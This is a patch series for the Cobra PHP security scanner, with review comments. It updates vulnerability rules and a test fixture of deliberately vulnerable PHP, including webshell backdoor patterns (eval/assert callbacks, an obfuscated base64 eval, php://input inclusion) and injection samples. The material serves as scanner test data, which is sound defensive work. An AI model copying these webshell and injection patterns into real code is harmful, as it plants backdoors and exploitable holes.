@@ -79,67 +76,176 @@ function curl($url){ $url = $_GET["url"]; if (!empty($url)) { - header("Location: ".$url); + header("Location: " . $url); } -$test = $_POST['test']; +$test = $_POST['test']; $test_uns = unserialize($test); -$xml = $_POST['xml']; +$xml = $_POST['xml']; $data = simplexml_load_string($xml); parse_str($_SERVER['QUERY_STRING']); $a = '0'; -if($a==1){ - echo "true!"; -}else{ - echo "false!"; +if ($a == 1) { + echo "true!"; +} else { + echo "false!"; } $file = $_POST["file_name"]; -if (!empty($file)){ - unlink($file); +if (!empty($file)) { + unlink($file); } - -header("Location: ".$_GET["url"]); +header("Location: " . $_GET["url"]); $host = $_POST['host']; $port = $_POST['port']; -function GetFile($host,$port,$link) -{ - $fp = fsockopen($host, intval($port), $errno, $errstr, 30); - if (!$fp) - { - echo "$errstr (error number $errno) \n"; - } - else - { - $out = "GET $link HTTP/1.1\r\n"; - $out .= "Host: $host\r\n"; - $out .= "Connection: Close\r\n\r\n"; - $out .= "Connection: Close\r\n\r\n"; - $out .= "\r\n"; - fwrite($fp, $out); - $contents=''; - while (!feof($fp)) - { - $contents.= fgets($fp, 1024); - } - fclose($fp); - return $contents; - } +function GetFile($host, $port, $link) { + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + if (!$fp) { + echo "$errstr (error number $errno) \n"; + } else { + $out = "GET $link HTTP/1.1\r\n"; + $out .= "Host: $host\r\n"; + $out .= "Connection: Close\r\n\r\n"; + $out .= "Connection: Close\r\n\r\n"; + $out .= "\r\n"; + fwrite($fp, $out); + $contents = ''; + while (!feof($fp)) { + $contents .= fgets($fp, 1024); + } + fclose($fp); + return $contents; + } } +//cvi-165001 +$surname = $_GET['surname']; +$filter = "(sn=" . $surname . 
")"; +$sr = ldap_search($ds, "o=My Company, c=US", $filter); +$info = ldap_get_entries($ds, $sr); + +//cvi-360001 +include "sss.jpg"; + +//cvi-360037 +$a = "http://www.test.com/sss.php"; +require_once $a; + +//cvi-360002 +array_filter($arr, base64_decode("ZXZhbA==")); + +//cvi-360003 +$e = "eval"; +array_filter($arr, $e); + +//cvi-360004 +echo @preg_replace('/xx/e', $_POST[sss], axxa); + +//cvi-360005 +($e = $_POST['e']) && @preg_replace($e, "eval", 'hello'); + +//cvi-360006 +($code = $_POST['code']) && @preg_replace('/ad/e', '@' . str_rot13('riny') .'($code)', 'add'); + +//cvi-360007 +//call_user_func('assert', $_REQUEST['pass']); //这种和参数可控重复 同理加密的字符串检测不出来 +//call_user_func('assert', $arr); + +//cvi-360008 +$a = 'assert'; +call_user_func($a, $arr); + +//cvi-360009 +$db = new SQLite3('sqlite.db3'); +$db->createFunction('myfunc', $_POST['e']); + +//cvi-360010 +$e = $_REQUEST['e']; +$db = new SQLite3('sqlite.db3'); +$db->createFunction('myfunc', $e); +$stmt = $db->prepare("SELECT myfunc(?)"); +$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); +$stmt->execute(); + +//cvi-360011 +$sa = create_function('xxx', "eval()");$sa(); + +//cvi-360012 +$func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));');$func($_GET['func']); + +//cvi-360013 +//$id = $_GET['id'];$q = 'echo' . $id . 'is' . $a . ";";$sy = create_function('$a', $q); +$sa = "eval()"; create_function('xxx', $sa); + +//cvi-360014 +$a = "eval";$a($_GET['a']); + +//cvi-360015 感觉有误报的 +if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { + sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); +} else { + echo 'Error opening sqlite db: ' . 
$sqliteerror;exit; +} + +//cvi-360016 +filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); + +//cvi-360017 +$op = array('options' => 'assert'); +filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); + +//cvi-360018 +mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); + +//cvi-360019 +$e = "\ise"; +$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/", "", $data, $e); + +//cvi-360020 +array_walk($array, "eval"); + +//cvi-360021 +$a = "ZXZhbA==";array_walk($array, base64_decode($a)); + +//cvi-360022 +ini_set('allow_url_include, 1'); // Allow url inclusion in this script +include 'php://input'; + +//cvi-360026 +$cb = 'system'; +ob_start($cb); +echo $_GET[c]; +ob_end_flush(); + +//cvi-360028 +eval(base64_decode( +ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); + +//cvi-360032 +//<div class = bartitle><h4> '.sh_name().' </h4> .:r57 . bizDq99Shell:.</div> + +//cvi-360033 +$shver = "Emp3ror Undetectable #18"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("N3tsh_surl"); + $surl = ""; +} elseif (!empty($set_surl)) {$surl = $set_surl; + setcookie("N3tsh_surl", $surl);} else { $surl = $_REQUEST["N3tsh_surl"];} //Set this cookie for manual SURL -$surname=$_GET['surname']; -$filter = "(sn=" . $surname . ")"; -$sr=ldap_search($ds, "o=My Company, c=US", $filter); -$info = ldap_get_entries($ds, $sr); +//cvi-360034 +$_POST['sa']($_POST['sb']); +//cvi-360035 +$func = new ReflectionFunction($_GET[m]); +echo $func->invokeArgs(array($_GET[c], $_GET[id])); -$redis = new Redis(); -$redis->connect('192.168.1.2', 6379); -$redis->auth('passwd123!#'); \ No newline at end of file +//cvi-360036 +$a = 'assert'; +$arr = new ArrayObject(array('test', $_REQUEST['pass'])); +$arr->uasort($a); From 9da743d9921f7b4382565b47f0148d15240c2bbb Mon Sep 17 00:00:00 2001 
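Review bot: The `//cvi-165001` label on the LDAP sample does not match any rule in this series—the LDAP injection rule added earlier on this page is `CVI-250001`—and `//cvi-360037` labels a `require_once $a;` sample for which no rule file appears in any diffstat here (the webshell rules stop at CVI-360036). Since these comments are what lets a reader map a fixture line to the rule it is meant to trigger, fix the first to `//cvi-250001` and either add the missing rule or mark the second `// TODO: no rule yet`. The `//cvi-360007` sample is committed commented out with a note that it duplicates the parameter-controllable rule; if that is the intended behaviour, the duplicate detection belongs in an `assert="false"` case in the rule, not in a disabled fixture.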
From: BlBana <635373043@qq.com> Date: Thu, 7 Sep 2017 17:54:14 +0800 Subject: [PATCH 23/29] fixed two bugs --- cobra/engine.py | 6 ++++-- cobra/parser.py | 2 +- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/cobra/engine.py b/cobra/engine.py index 84caa107..8efa2bbf 100644 --- a/cobra/engine.py +++ b/cobra/engine.py @@ -522,7 +522,7 @@ def is_annotation(self): - Java: :return: boolean """ - match_result = re.findall(r"(#|\\\*|\/\/)+", self.code_content) + match_result = re.findall(r"^(#|\\\*|\/\/)+", self.code_content) # Skip detection only on match if self.is_match_only_rule(): return False @@ -620,9 +620,11 @@ def scan(self): if self.file_path[-3:].lower() == 'php': try: ast = CAST(self.rule_match, self.target_directory, self.file_path, self.line_number, self.code_content) + rule_repair = [] if self.rule_match_mode == const.mm_function_param_controllable: rule_match = self.rule_match.strip('()').split('|') # 漏洞规则整理为列表 - rule_repair = self.rule_repair.strip('()').split('|') # 修复规则整理为列表 + if self.rule_repair is not None: + rule_repair = self.rule_repair.strip('()').split('|') # 修复规则整理为列表 logger.debug('[RULE_MATCH] {r}'.format(r=rule_match)) try: with open(self.file_path, 'r') as fi: diff --git a/cobra/parser.py b/cobra/parser.py index 39c0f04a..7d17f481 100644 --- a/cobra/parser.py +++ b/cobra/parser.py @@ -135,7 +135,7 @@ def get_binaryop_params(node): # 当为BinaryOp类型时,分别对left和righ if isinstance(node.right, php.Variable): params.append(node.right.name) - elif not isinstance(node.right, php.Variable) or not isinstance(node.left, php.Variable): # right不为变量时 + if not isinstance(node.right, php.Variable) or not isinstance(node.left, php.Variable): # right不为变量时 params_right = get_binaryop_deep_params(node.right, params) params_left = get_binaryop_deep_params(node.left, params) From 64386399b410f5e3a3338355457163626150668d Mon Sep 17 00:00:00 2001 
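Review bot: The anchored regex in `is_annotation`, `r"^(#|\\\*|\/\/)+"`, still contains `\\\*`, which in a raw string is the pattern `\\\*`—a literal backslash followed by a literal `*`—so it never recognises a `/* ... */` opener or a ` * ` continuation line; only `#` and `//` comments are actually detected. The new `^` anchor also rejects indented comments unless `self.code_content` is stripped before this call, which the hunk does not show. Use `re.findall(r"^\s*(#|/\*|//)", self.code_content)` (add `|\*` if block-comment continuation lines should count; for PHP/Java that is a judgement call). `is_annotation` begins outside this hunk, so I cannot see how `code_content` is prepared.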
From: BlBana <635373043@qq.com> Date: Fri, 8 Sep 2017 11:47:07 +0800 Subject: [PATCH 24/29] modified test case --- tests/test_parser.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tests/test_parser.py b/tests/test_parser.py index 222bcf10..be6c6ef7 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -21,8 +21,9 @@ code_contents = fi.read() sensitive_func = ['system'] +repairs = [] lineno = 7 def test_scan_parser(): - assert scan_parser(code_contents, sensitive_func, lineno) + assert scan_parser(code_contents, sensitive_func, lineno, repairs) From 7e857770fcd056dacb4847298c23e885932067bc Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Mon, 11 Sep 2017 10:11:06 +0800 Subject: [PATCH 25/29] improve rules --- rules/CVI-120001.xml | 20 +++++++++----------- rules/CVI-120002.xml | 8 ++++---- rules/CVI-120003.xml | 1 - rules/CVI-120004.xml | 4 ++-- rules/CVI-140003.xml | 2 +- rules/CVI-140004.xml | 27 --------------------------- rules/CVI-160002.xml | 2 +- rules/CVI-160003.xml | 2 +- rules/CVI-160004.xml | 2 +- rules/CVI-167001.xml | 9 +-------- rules/CVI-180001.xml | 2 +- rules/CVI-181001.xml | 2 +- 12 files changed, 22 insertions(+), 59 deletions(-) delete mode 100644 rules/CVI-140004.xml diff --git a/rules/CVI-120001.xml b/rules/CVI-120001.xml index b469bb70..b0abf7d7 100644 --- a/rules/CVI-120001.xml +++ b/rules/CVI-120001.xml @@ -7,20 +7,19 @@ <level value="6"/> <test> <case assert="true"><![CDATA[ - function curl($url){ - $ch = curl_init(); - curl_setopt($ch, CURLOPT_URL, $url); - curl_setopt($ch, CURLOPT_HEADER, 0); - curl_exec($ch); - curl_close($ch); - } - $url = $_GET['url']; - curl($url); + function curl($url){ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_exec($ch); + curl_close($ch); + } + $url = $_GET['url']; + curl($url); ]]></case> </test> <solution> ## 安全风险 - SSRF漏洞(Server-Side Request Forgery) ### 形成原理 
@@ -42,7 +41,6 @@ curl_exec($ch); curl_close($ch); } - $url = $_GET['url']; curl($url); ``` diff --git a/rules/CVI-120002.xml b/rules/CVI-120002.xml index 6fa20fb0..d6484be8 100644 --- a/rules/CVI-120002.xml +++ b/rules/CVI-120002.xml @@ -6,12 +6,12 @@ <level value="7"/> <test> <case assert="true"><![CDATA[ - $url = $_GET['url']; - echo file_get_contents($url); + $url = $_GET['url']; + echo file_get_contents($url); ]]></case> <case assert="false"><![CDATA[ - $url = "http://www.example.com"; - echo file_get_contents($url); + $url = "http://www.example.com"; + echo file_get_contents($url); ]]></case> </test> <solution> diff --git a/rules/CVI-120003.xml b/rules/CVI-120003.xml index 63b17a91..a2598623 100644 --- a/rules/CVI-120003.xml +++ b/rules/CVI-120003.xml @@ -3,7 +3,6 @@ <name value="get_headers导致的SSRF"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[get_headers]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,|preg_match(?:_all)?\s*\(\s*(?:.+?)\s*,\s*{{PARAM}}\s*[,\)]]]></repair> <level value="7"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-120004.xml b/rules/CVI-120004.xml index 340b9e8f..eb12d7ae 100644 --- a/rules/CVI-120004.xml +++ b/rules/CVI-120004.xml @@ -6,8 +6,8 @@ <level value="7"/> <test> <case assert="true"><![CDATA[ - $host = $_GET['host']; - $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + $host = $_GET['host']; + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); ]]></case> </test> <solution> diff --git a/rules/CVI-140003.xml b/rules/CVI-140003.xml index 0b3fe9dd..2ab2f550 100644 --- a/rules/CVI-140003.xml +++ b/rules/CVI-140003.xml 
@@ -3,7 +3,7 @@ <name value="直接输出入参可能导致XSS"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[(echo|print|print_r|exit|die|printf|vprintf|trigger_error|user_error|odbc_result_all|ovrimos_result_all|ifx_htmltbl_result)]]></match> - <repair block="in-function"><![CDATA[(htmlspecialchars\s*\(\s*{{PARAM}}\s*)]]></repair> + <repair block="in-function"><![CDATA[(htmlspecialchars]]></repair> <level value="4"/> <test> <case assert="true"><![CDATA[print_r ($_GET['test']);]]></case> diff --git a/rules/CVI-140004.xml b/rules/CVI-140004.xml deleted file mode 100644 index 7dd56c23..00000000 --- a/rules/CVI-140004.xml +++ /dev/null @@ -1,27 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="echo或print直接输出入参导致XSS"/> - <language value="php"/> - <match mode="regex-param-controllable"><![CDATA[(echo|print)\s*(\()?\s*.*\s*(,\s*.*)*(\))?;]]></match> - <repair block="in-function"><![CDATA[(htmlspecialchars\s*\(\s*{{PARAM}}\s*)]]></repair> - <level value="4"/> - <test> - <case assert="true"><![CDATA[echo ($_GET['test']);]]></case> - <case assert="true"><![CDATA[echo $_GET['test'];]]></case> - <case assert="true"><![CDATA[print("Hello " . $_GET["name"]);]]></case> - <case assert="true"><![CDATA[print 'foo is $_GET['test']';]]></case> - </test> - <solution> - ## 安全风险 - 直接输出入参会导致XSS - - ## 修复方案 - 1. 使用`htmlentities`函数进行转义 - ```php - print("Hello " . htmlentities($_GET["name"], ENT_QUOTES, "utf-8"); - ``` - 2. 使用Begis安全组件对参数进行过滤后使用 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-160002.xml b/rules/CVI-160002.xml index 2afb0fb7..c5ccc049 100644 --- a/rules/CVI-160002.xml +++ b/rules/CVI-160002.xml 
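Review bot: The repair on the changed line of the CVI-140003 hunk, `<repair block="in-function"><![CDATA[(htmlspecialchars]]></repair>`, is now a bare function name, so the XSS finding is presumably suppressed whenever htmlspecialchars is called anywhere in the enclosing function, not only on the value that reaches echo/print; `echo htmlspecialchars($a) . $_GET['b'];` would count as repaired. The old `{{PARAM}}` form tied the escape to the tainted argument; if the engine can no longer express that, the rule's solution text should say the check is function-scoped rather than argument-scoped. The unbalanced `(` only works because the engine strips leading and trailing parentheses; `htmlspecialchars` alone reads better. The CVI-140004 rule deleted in this same patch recommended htmlentities, which this repair does not list, so `(htmlspecialchars|htmlentities)` would keep the advice consistent.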
@@ -9,7 +9,7 @@ <case assert="false"><![CDATA[$query = "SELECT id FROM products LIMIT 20 ;";]]></case> <case assert="true"><![CDATA[$s = "select" + $v + "from " + $tb + "where id = " + $id;]]></case> <case assert="true"><![CDATA[ - $query = "SELECT id, name, inserted, size FROM products + $query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; diff --git a/rules/CVI-160003.xml b/rules/CVI-160003.xml index a869afb1..be45e4b9 100644 --- a/rules/CVI-160003.xml +++ b/rules/CVI-160003.xml @@ -3,7 +3,7 @@ <name value="MySQL Execute Functions可能导致SQL注入"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[(mysql_query|mysql_db_query)]]></match> - <repair block="in-function"><![CDATA[(?:mysql_real_escape_string|addslashes)\s*\(\s*{{PARAM}}\s*[\),]]]></repair> + <repair block="in-function"><![CDATA[(mysql_real_escape_string|addslashes)]]></repair> <level value="8"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-160004.xml b/rules/CVI-160004.xml index 487a30af..4a55e1a4 100644 --- a/rules/CVI-160004.xml +++ b/rules/CVI-160004.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="SQL Execute Functions可能导致SQL注入"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[(mysqli_query|pg_execute|pg_insert|pg_query|pg_select|pg_update|sqlite_query|msql_query|mssql_query|odbc_exec|fbsql_query|sybase_query|ibase_query|dbx_query|ingres_query|ifx_query|oci_parse|sqlsrv_query|maxdb_query|db2_exec)\s?\(]]></match> + <match mode="function-param-controllable"><![CDATA[(mysqli_query|pg_execute|pg_insert|pg_query|pg_select|pg_update|sqlite_query|msql_query|mssql_query|odbc_exec|fbsql_query|sybase_query|ibase_query|dbx_query|ingres_query|ifx_query|oci_parse|sqlsrv_query|maxdb_query|db2_exec)]]></match> <level value="8"/> <test> <case assert="true"><![CDATA[ 
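Review bot: The repair on the changed line of the CVI-160003 hunk, `(mysql_real_escape_string|addslashes)`, treats addslashes as a full fix for mysql_query/mysql_db_query, but addslashes is not charset-aware and does nothing for values interpolated outside quotes (`ORDER BY $order`, `LIMIT $limit` as in the neighbouring CVI-160002 case), so a query escaped with it can still be injectable. Listing it as a repair turns such findings into silent false negatives; I would keep only `mysql_real_escape_string` and state in the solution text that addslashes is not a substitute and offers no protection in unquoted numeric or ORDER BY positions. As with the other rules in this patch, the bare-name form appears to suppress on any call in the function rather than on the tainted parameter, which the rule should say.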
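Review bot: The function list on the changed line of the CVI-160004 hunk still contains `pg_execute`, whose user-supplied argument is the bound-parameter array of an already prepared statement; controllable values there are not a SQL-injection sink, so each such call becomes a level-8 false positive. The params argument of `sqlsrv_query` is bound the same way, although its SQL-string argument is a genuine sink. If function-param-controllable cannot distinguish argument positions, dropping `pg_execute` and covering `pg_prepare`, where the query string lives, keeps the rule honest. Removing the trailing `\s?\(` is consistent with the bare-name matching the engine now expects.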
diff --git a/rules/CVI-167001.xml b/rules/CVI-167001.xml index 9e1d2a1f..353c9147 100644 --- a/rules/CVI-167001.xml +++ b/rules/CVI-167001.xml @@ -7,17 +7,13 @@ <level value="5"/> <test> <case assert="true"><![CDATA[ - <?php $xml = $_POST['xml']; $data = simplexml_load_string($xml); - ?> ]]></case> <case assert="false"><![CDATA[ - <?php $xml = $_POST['xml']; libxml_disable_entity_loader(true); $data = simplexml_load_string($xml); - ?> ]]></case> </test> <solution> @@ -42,18 +38,15 @@ ## 举例 ```php - <?php $xml = $_POST['xml']; $data = simplexml_load_string($xml); - ?> ``` 修改后代码 ```php - <?php $xml = $_POST['xml']; libxml_disable_entity_loader(true); $data = simplexml_load_string($xml); - ?> + ``` </solution> <status value="on"/> <author name="Lightless" email="root@lightless.me "/> diff --git a/rules/CVI-180001.xml b/rules/CVI-180001.xml index 5fdcee4c..676ab446 100644 --- a/rules/CVI-180001.xml +++ b/rules/CVI-180001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="远程代码执行"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)]]></match> + <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|array_walk_recursive|uasort|uksort|usort)]]></match> <level value="10"/> <test> <case assert="true"><![CDATA[array_map($_GET['pass'],$array);]]></case> diff --git a/rules/CVI-181001.xml b/rules/CVI-181001.xml index 0386083d..a2b8bde5 100644 --- a/rules/CVI-181001.xml +++ b/rules/CVI-181001.xml 
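Review bot: The CVI-180001 hunk adds `array_walk_recursive` to the RCE sink list, but the test block that follows still has only `array_map($_GET['pass'],$array);`, so nothing verifies the new name is matched. Adding `<case assert="true"><![CDATA[array_walk_recursive($array, $_GET['pass']);]]></case>` would pin the addition. The callback is the second argument for array_walk_recursive, unlike array_map where it is the first, so if function-param-controllable only examines a particular position this case would also reveal that. The closing `</test>` and any further cases lie outside the hunk.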
@@ -3,7 +3,7 @@ <name value="远程命令执行"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[(system|passthru|exec|pcntl_exec|shell_exec|popen|proc_open|ob_start|expect_popen|mb_send_mail|w32api_register_function|w32api_invoke_function|ssh2_exec)]]></match> - <repair block="in-function"><![CDATA[escapeshellcmd\s*\(\s*(.+?)\s*\)|escapeshellarg\s*\(\s*(.+?)\s*\)]]></repair> + <repair block="in-function"><![CDATA[(escapeshellcmd|escapeshellarg)]]></repair> <level value="10"/> <test> <case assert="true"><![CDATA[system($_GET['pass']);]]></case> From 8f5c8aae9653f3153944ba2abc268b290f7d1239 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Mon, 11 Sep 2017 11:54:49 +0800 Subject: [PATCH 26/29] improve rules --- rules/CVI-210001.xml | 2 +- rules/CVI-260001.xml | 2 +- rules/CVI-320002.xml | 12 +++++----- rules/CVI-350001.xml | 2 +- rules/CVI-360001.xml | 2 +- rules/CVI-360002.xml | 2 +- rules/CVI-360015.xml | 25 ------------------- rules/CVI-360023.xml | 16 ------------- rules/CVI-360024.xml | 19 --------------- rules/CVI-360025.xml | 19 --------------- rules/CVI-360027.xml | 2 +- rules/CVI-360029.xml | 12 ++++++++++ rules/CVI-360030.xml | 8 +++++++ rules/CVI-360033.xml | 2 +- tests/vulnerabilities/v.php | 48 ++++++++++++++++++------------------- 15 files changed, 57 insertions(+), 116 deletions(-) delete mode 100644 rules/CVI-360015.xml delete mode 100644 rules/CVI-360023.xml delete mode 100644 rules/CVI-360024.xml delete mode 100644 rules/CVI-360025.xml diff --git a/rules/CVI-210001.xml b/rules/CVI-210001.xml index 20af97e9..c93be764 100644 --- a/rules/CVI-210001.xml +++ b/rules/CVI-210001.xml 
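Review bot: Listing `escapeshellcmd` as a repair on the changed line of the CVI-181001 hunk, `(escapeshellcmd|escapeshellarg)`, will suppress real findings: escapeshellcmd neutralises shell metacharacters but leaves spaces and a leading `-` intact, so `system('ls ' . escapeshellcmd($_GET['dir']))` still lets an attacker append arguments or option flags. Only escapeshellarg quotes the value as a single argument; I would keep `escapeshellarg` as the sole repair and, if the engine cannot merely downgrade severity, note in the solution text that escapeshellcmd alone does not prevent argument injection. The bare-name form also appears to accept an escape call anywhere in the function rather than on the tainted parameter, which widens the false-negative window further.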
@@ -3,7 +3,7 @@ <name value="未经验证的任意链接跳转"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[header]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> + <repair block="in-function-up"><![CDATA[in_array]]></repair> <level value="5"/> <test> <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> diff --git a/rules/CVI-260001.xml b/rules/CVI-260001.xml index 9ca64e81..fdc5186f 100644 --- a/rules/CVI-260001.xml +++ b/rules/CVI-260001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="PHP反序列化漏洞"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[is_a|unserialize]]></match> + <match mode="function-param-controllable"><![CDATA[unserialize]]></match> <level value="5"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-320002.xml b/rules/CVI-320002.xml index 189c78b5..18e4335e 100644 --- a/rules/CVI-320002.xml +++ b/rules/CVI-320002.xml @@ -3,7 +3,7 @@ <name value="extract导致变量覆盖漏洞"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[extract]]></match> - <repair mode="in-current-line"><![CDATA[extract\s*\(\s*{{PARAM}}\s*,\s*(?:EXTR_SKIP|EXTR_PREFIX_SAME|EXTR_PREFIX_ALL|EXTR_PREFIX_IF_EXISTS|EXTR_IF_EXISTS)\s*[,\)]]]></repair> + <repair mode="in-current-line"><![CDATA[extract\s*\(\s*\w*\s*,\s*(?:EXTR_SKIP|EXTR_PREFIX_SAME|EXTR_PREFIX_ALL|EXTR_PREFIX_IF_EXISTS|EXTR_IF_EXISTS)\s*[,\)]]]></repair> <level value="4"/> <test> <case assert="true"><![CDATA[extract($_GET['var']);]]></case> @@ -18,12 +18,12 @@ ## 举例 ```php <?php - $a = '0'; - extract($_GET); - if($a==1){echo "true!";} - else{echo "false!";} + $a = '0'; + extract($_GET); + if($a==1){echo "true!";} + else{echo "false!";} ?> - + ``` 构造 http://www.test.com/test.php?a=1时,会打印出true </solution> diff --git a/rules/CVI-350001.xml b/rules/CVI-350001.xml index 4383a693..b3f39240 100644 --- a/rules/CVI-350001.xml +++ b/rules/CVI-350001.xml 
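Review bot: The repair on the changed line of the CVI-210001 hunk is now just `in_array`, so any in_array call above the header() call suppresses the open-redirect finding whatever it tests; the previous `in_array\s*\(\s*{{PARAM}}\s*,` at least tied it to the redirected value. in_array without its third argument also compares loosely, so the solution's whitelist advice should read `in_array($url, $allowed, true)`. If the engine can no longer bind the repair to the parameter, the rule should say the check is function-scoped.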
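Review bot: The rewritten repair regex on the changed line of the CVI-320002 hunk, `extract\s*\(\s*\w*\s*,\s*(?:EXTR_SKIP|...)`, cannot match the usual safe call `extract($_GET, EXTR_SKIP);` because `\w*` does not consume `$`, so the EXTR_* flags are never recognised and every such call stays a finding; `[^,]+` in place of `\w*` would match. The element also uses `mode="in-current-line"` while every other repair in this series uses `block="..."`, so it is unclear the engine reads this attribute at all; and since this rule is function-param-controllable, the PATCH 23 engine path splits the repair on `|`, which would break the `(?:EXTR_SKIP|EXTR_PREFIX_SAME|...)` group into fragments if that path applies here. A `<case assert="false"><![CDATA[extract($_GET, EXTR_SKIP);]]></case>` next to the existing true case would expose whichever of these is the real problem.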
@@ -3,7 +3,7 @@ <name value="unlink删除文件"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[unlink]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> + <repair block="in-function-up"><![CDATA[in_array]]></repair> <level value="3"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index afdb2aec..2f4773e5 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell1"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+]]></match> + <match mode="regex-only-match"><![CDATA[\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[include "sss.jpg";]]></case> diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml index 2544dfde..fb6a1eea 100644 --- a/rules/CVI-360002.xml +++ b/rules/CVI-360002.xml 
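Review bot: Removing `php` from the scheme alternation on the changed line of the CVI-360001 hunk means `include 'php://input';` no longer matches webshell1, yet the vulnerability fixture in this same patch still carries `ini_set('allow_url_include, 1'); include 'php://input';` as a sample to detect. If another rule is meant to catch that sample, a comment naming it in the fixture would keep a future false negative from going unnoticed; otherwise a narrower `php://input` alternative would preserve that coverage while avoiding whatever false positive motivated the removal, which the commit does not record. The rest of the regex, including the `[\r\n;/\*]+` terminator, is unchanged.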
@@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell2"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\s*((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)\s*\(+\s*.{1,100}),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(].{1,25})\s*\)]]></match> + <match mode="regex-only-match"><![CDATA[\s*((array_filter|array_reduce|array_diff_ukey|array_udiff|uasort|uksort|usort)\s*\(+\s*.{1,100}),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(].{1,25})\s*\)]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[array_filter($arr, base64_decode("ZXZhbA=="));]]></case> diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml deleted file mode 100644 index 0ad11515..00000000 --- a/rules/CVI-360015.xml +++ /dev/null @@ -1,25 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell15"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\(]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - if ($dbhandle = sqlite_open('mysqlitedb', 